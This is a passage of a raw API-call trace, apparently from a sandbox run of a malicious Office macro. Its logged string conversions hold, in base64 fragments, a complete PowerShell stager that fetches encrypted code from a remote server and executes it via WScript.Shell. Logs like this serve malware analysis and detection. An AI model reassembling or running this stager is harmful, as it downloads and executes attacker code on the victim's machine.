cchWideChar=102 | out: lpWideCharStr="wAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMA") returned 50 [0175.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQ\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c150cec, cchWideChar=102 | out: lpWideCharStr="ZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQ") returned 50 [0175.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBl\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c15100e, cchWideChar=102 | out: lpWideCharStr="A6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBl") returned 50 [0175.793] CRetailMalloc_Alloc () returned 0x1fe1af8c9d0 [0175.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAF\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c151330, cchWideChar=102 | out: lpWideCharStr="AD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAF") returned 50 [0175.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4A\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c151652, cchWideChar=102 | out: lpWideCharStr="MAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4A") returned 50 [0175.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="dAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c151974, cchWideChar=102 | out: lpWideCharStr="dAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKA") returned 50 [0175.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBX\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c151c96, cchWideChar=102 | out: lpWideCharStr="BXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBX") returned 50 [0175.793] CRetailMalloc_Alloc () returned 0x1fe1af8d990 [0175.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAH\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c151fb8, cchWideChar=102 | out: lpWideCharStr="ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAH") returned 50 [0175.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="YAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1522da, cchWideChar=102 | out: lpWideCharStr="YAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcA") returned 50 [0175.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="OwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1525fc, cchWideChar=102 | out: lpWideCharStr="OwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZA") returned 50 [0175.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c15291e, cchWideChar=102 | out: lpWideCharStr="BpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0") returned 50 [0175.794] CRetailMalloc_Alloc () returned 0x1fe1af8fb50 [0175.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c152c40, cchWideChar=102 | out: lpWideCharStr="AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG") returned 50 [0175.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c152f62, cchWideChar=102 | out: lpWideCharStr="8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIA") returned 50 [0175.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c153284, cchWideChar=102 | out: lpWideCharStr="MABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARA") returned 50 [0175.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBN\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1535a6, cchWideChar=102 | out: lpWideCharStr="BrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBN") returned 50 [0175.794] CRetailMalloc_Alloc () returned 0x1fe1af90450 [0175.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBAD\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1538c8, cchWideChar=102 | out: lpWideCharStr="AFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBAD") returned 50 [0175.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="QAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c153bea, cchWideChar=102 | out: lpWideCharStr="QAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMA") returned 50 [0175.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="LgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQ\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c153f0c, cchWideChar=102 | out: lpWideCharStr="LgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQ") returned 50 [0175.795] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1fe1c160000 [0175.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQAp\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c16025c, cchWideChar=102 | out: lpWideCharStr="BkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQAp") returned 50 [0175.795] CRetailMalloc_Alloc () returned 0x1fe1af8de10 [0175.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c16057e, cchWideChar=102 | out: lpWideCharStr="ADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC") returned 50 [0175.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1608a0, cchWideChar=102 | out: lpWideCharStr="4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQA") returned 50 [0175.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALg\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c160bc2, cchWideChar=102 | out: lpWideCharStr="ZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALg") returned 50 [0175.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c160ee4, cchWideChar=102 | out: lpWideCharStr="BQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9") returned 50 [0175.796] CRetailMalloc_Alloc () returned 0x1fe1af8fd90 [0175.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c161206, cchWideChar=102 | out: lpWideCharStr="ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG") returned 50 [0175.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c161528, cchWideChar=102 | out: lpWideCharStr="4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwA") returned 50 [0175.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="dABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcw\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c16184a, cchWideChar=102 | out: lpWideCharStr="dABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcw") returned 50 [0175.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c161b6c, cchWideChar=102 | out: lpWideCharStr="A7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3") returned 50 [0175.796] CRetailMalloc_Alloc () returned 0x1fe1af8edd0 [0175.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c161e8e, cchWideChar=102 | out: lpWideCharStr="AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC") returned 50 [0175.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1621b0, cchWideChar=102 | out: lpWideCharStr="4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMA") returned 50 [0175.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="QwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1624d2, cchWideChar=102 | out: lpWideCharStr="QwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMA") returned 50 [0175.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1627f4, cchWideChar=102 | out: lpWideCharStr="BWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9") returned 50 [0175.797] CRetailMalloc_Alloc () returned 0x1fe1af8f010 [0175.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsAC\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c162b16, cchWideChar=102 | out: lpWideCharStr="AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsAC") returned 50 [0175.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="QASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c162e38, cchWideChar=102 | out: lpWideCharStr="QASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsA") returned 50 [0175.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWw\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c16315a, cchWideChar=102 | out: lpWideCharStr="MAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWw") returned 50 [0175.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABd\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c16347c, cchWideChar=102 | out: lpWideCharStr="AkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABd") returned 50 [0175.798] CRetailMalloc_Alloc () returned 0x1fe1af8f250 [0175.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c16379e, cchWideChar=102 | out: lpWideCharStr="ACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF") returned 50 [0175.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c163ac0, cchWideChar=102 | out: lpWideCharStr="0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQA") returned 50 [0175.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="fAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c163de2, cchWideChar=102 | out: lpWideCharStr="fAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASA") returned 50 [0175.798] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1fe1c170000 [0175.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABT\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c17016c, cchWideChar=102 | out: lpWideCharStr="A9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABT") returned 50 [0175.799] CRetailMalloc_Alloc () returned 0x1fe1af990b0 [0175.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdAC\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c17048e, cchWideChar=102 | out: lpWideCharStr="AFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdAC") returned 50 [0175.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="wAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1707b0, cchWideChar=102 | out: lpWideCharStr="wAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgA") returned 50 [0175.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="JABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQ\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c170ad2, cchWideChar=102 | out: lpWideCharStr="JABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQ") returned 50 [0175.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="B9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAo\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c170df4, cchWideChar=102 | out: lpWideCharStr="B9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAo") returned 50 [0175.800] CRetailMalloc_Alloc () returned 0x1fe1af987b0 [0175.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAG\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c171116, cchWideChar=102 | out: lpWideCharStr="ACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAG") returned 50 [0175.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="gAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c171438, cchWideChar=102 | out: lpWideCharStr="gAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgA") returned 50 [0175.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="NwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOw\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c17175a, cchWideChar=102 | out: lpWideCharStr="NwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOw") returned 50 [0175.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABE\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c171a7c, cchWideChar=102 | out: lpWideCharStr="AkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABE") returned 50 [0175.800] CRetailMalloc_Alloc () returned 0x1fe1af992f0 [0175.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAG\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c171d9e, cchWideChar=102 | out: lpWideCharStr="AGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAG") returned 50 [0175.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="QAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1720c0, cchWideChar=102 | out: lpWideCharStr="QAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQA") returned 50 [0175.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="YQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1723e2, cchWideChar=102 | out: lpWideCharStr="YQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaA") returned 50 [0175.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAk\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c172704, cchWideChar=102 | out: lpWideCharStr="BdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAk") returned 50 [0175.800] CRetailMalloc_Alloc () returned 0x1fe1af98c30 [0175.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AE\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c172a26, cchWideChar=102 | out: lpWideCharStr="AFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AE") returned 50 [0175.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="kARQBYAA==\x0b", cbMultiByte=10, lpWideCharStr=0x1fe1c172d48, cchWideChar=22 | out: lpWideCharStr="kARQBYAA==") returned 10 [0175.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="WScript.Shell", cbMultiByte=13, lpWideCharStr=0x1fe1c172f8a, cchWideChar=28 | out: lpWideCharStr="WScript.Shell") returned 13 [0175.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CreateObject") returned 0x108af8 [0175.801] strcpy_s (in: _Dst=0x5fff3642d0, _DstSize=0xd, _Src="CreateObject" | out: _Dst="CreateObject") returned 0x0 [0175.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="CreateObject", cbMultiByte=13, lpWideCharStr=0x5fff364120, cchWideChar=13 | out: lpWideCharStr="CreateObject") returned 13 [0175.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateObject", cchWideChar=-1, lpMultiByteStr=0x5fff3642d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateObject", lpUsedDefaultChar=0x0) returned 13 [0175.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CreateObject") returned 0x108af8 [0175.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="CreateObject", cbMultiByte=13, lpWideCharStr=0x5fff364250, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13 [0175.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="CreateObject", cbMultiByte=13, lpWideCharStr=0x5fff3643b0, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13 [0175.801] CRetailMalloc_Alloc () returned 0x1fe1afa0280 [0175.801] CRetailMalloc_Alloc () returned 0x1fe14dffe10 [0175.801] CRetailMalloc_Alloc () returned 0x1fe13f5ea50 [0175.801] CRetailMalloc_Alloc () returned 0x1fe13f5ea90 [0175.801] CRetailMalloc_Alloc () returned 0x1fe14dff690 [0175.801] CRetailMalloc_Alloc () returned 0x1fe1af84610 [0175.802] memcpy (in: _Dst=0x1fe1af84618, _Src=0x7fffd860a8e0, _Size=0x14 | out: _Dst=0x1fe1af84618) returned 0x1fe1af84618 [0175.802] memcpy (in: _Dst=0x1fe1af84610, _Src=0x7fffd860a930, _Size=0x58 | out: _Dst=0x1fe1af84610) returned 0x1fe1af84610 [0175.802] memcpy (in: _Dst=0x1fe1af84668, _Src=0x7fffd860a8f8, _Size=0x18 | out: _Dst=0x1fe1af84668) returned 0x1fe1af84668 [0175.802] memcpy (in: _Dst=0x1fe1af84668, _Src=0x7fffd860b468, _Size=0x20 | out: _Dst=0x1fe1af84668) returned 0x1fe1af84668 [0175.802] memcpy (in: _Dst=0x1fe18abe818, _Src=0x7fffd860a8f8, _Size=0x18 | out: _Dst=0x1fe18abe818) returned 0x1fe18abe818 [0175.802] memcpy (in: _Dst=0x1fe18abe818, _Src=0x7fffd860b468, _Size=0x20 | out: _Dst=0x1fe18abe818) returned 0x1fe18abe818 [0175.802] SysStringByteLen (bstr="") returned 0x0 [0175.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x5fff3640e0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@B6ÿ_", lpUsedDefaultChar=0x0) returned 0 [0175.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=0, lpWideCharStr=0x1fe1c17313a, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0175.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fffd8609cd0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0175.803] strcpy_s (in: _Dst=0x1fe1af98da8, _DstSize=0x9, _Src="VBE7.DLL" | out: _Dst="VBE7.DLL") returned 0x0 [0175.803] CRetailMalloc_Alloc () returned 0x1fe18921bf0 [0175.803] CRetailMalloc_GetSize () returned 0x26d [0175.803] CRetailMalloc_GetSize () returned 0x26d [0175.803] CRetailMalloc_GetSize () returned 0x26d [0175.803] GetCurrentProcess () returned 0xffffffffffffffff [0175.803] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe18921bf0, dwSize=0x4b) returned 1 [0175.803] CRetailMalloc_Free () returned 0x1 [0175.803] CRetailMalloc_Alloc () returned 0x1fe1af9b270 [0175.803] memcpy (in: _Dst=0x1fe1af9b298, _Src=0x5fff363db0, _Size=0x84 | out: _Dst=0x1fe1af9b298) returned 0x1fe1af9b298 [0175.803] memcpy (in: _Dst=0x1fe1895fa88, _Src=0x7fffd860a8f8, _Size=0x18 | out: _Dst=0x1fe1895fa88) returned 0x1fe1895fa88 [0175.803] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="asd") returned 0x107522 [0175.803] strcpy_s (in: _Dst=0x5fff3642d0, _DstSize=0x4, _Src="asd" | out: _Dst="asd") returned 0x0 [0175.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="asd", cbMultiByte=4, lpWideCharStr=0x5fff364120, cchWideChar=4 | out: lpWideCharStr="asd") returned 4 [0175.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="asd", cbMultiByte=4, lpWideCharStr=0x5fff364250, cchWideChar=5 | out: lpWideCharStr="asd") returned 4 [0175.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="asd", cbMultiByte=4, lpWideCharStr=0x5fff3643b0, cchWideChar=5 | out: lpWideCharStr="asd") returned 4 [0175.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="asd", cbMultiByte=4, lpWideCharStr=0x5fff3643b0, cchWideChar=5 | out: lpWideCharStr="asd") returned 4 [0175.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="asd", cbMultiByte=4, lpWideCharStr=0x5fff3643b0, cchWideChar=5 | out: lpWideCharStr="asd") returned 4 [0175.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="asd") returned 0x107522 [0175.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="asd", cbMultiByte=4, lpWideCharStr=0x5fff3643b0, cchWideChar=5 | out: lpWideCharStr="asd") returned 4 [0175.805] CRetailMalloc_Alloc () returned 0x1fe1aeef9c0 [0175.805] _mbscpy_s (in: _Dst=0x1fe1aeef9c0, _DstSizeInBytes=0x4, _Src=0x1fe1bfe2bb2 | out: _Dst=0x1fe1aeef9c0) returned 0x0 [0175.805] memcpy (in: _Dst=0x1fe1aeef9c7, _Src=0x1fe1aeef9c0, _Size=0x4 | out: _Dst=0x1fe1aeef9c7) returned 0x1fe1aeef9c7 [0175.805] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_asd") returned 0x103233 [0175.805] strcpy_s (in: _Dst=0x5fff3644c0, _DstSize=0xb, _Src="_B_var_asd" | out: _Dst="_B_var_asd") returned 0x0 [0175.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_B_var_asd", cbMultiByte=11, lpWideCharStr=0x5fff364310, cchWideChar=11 | out: lpWideCharStr="_B_var_asd") returned 11 [0175.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_B_var_asd", 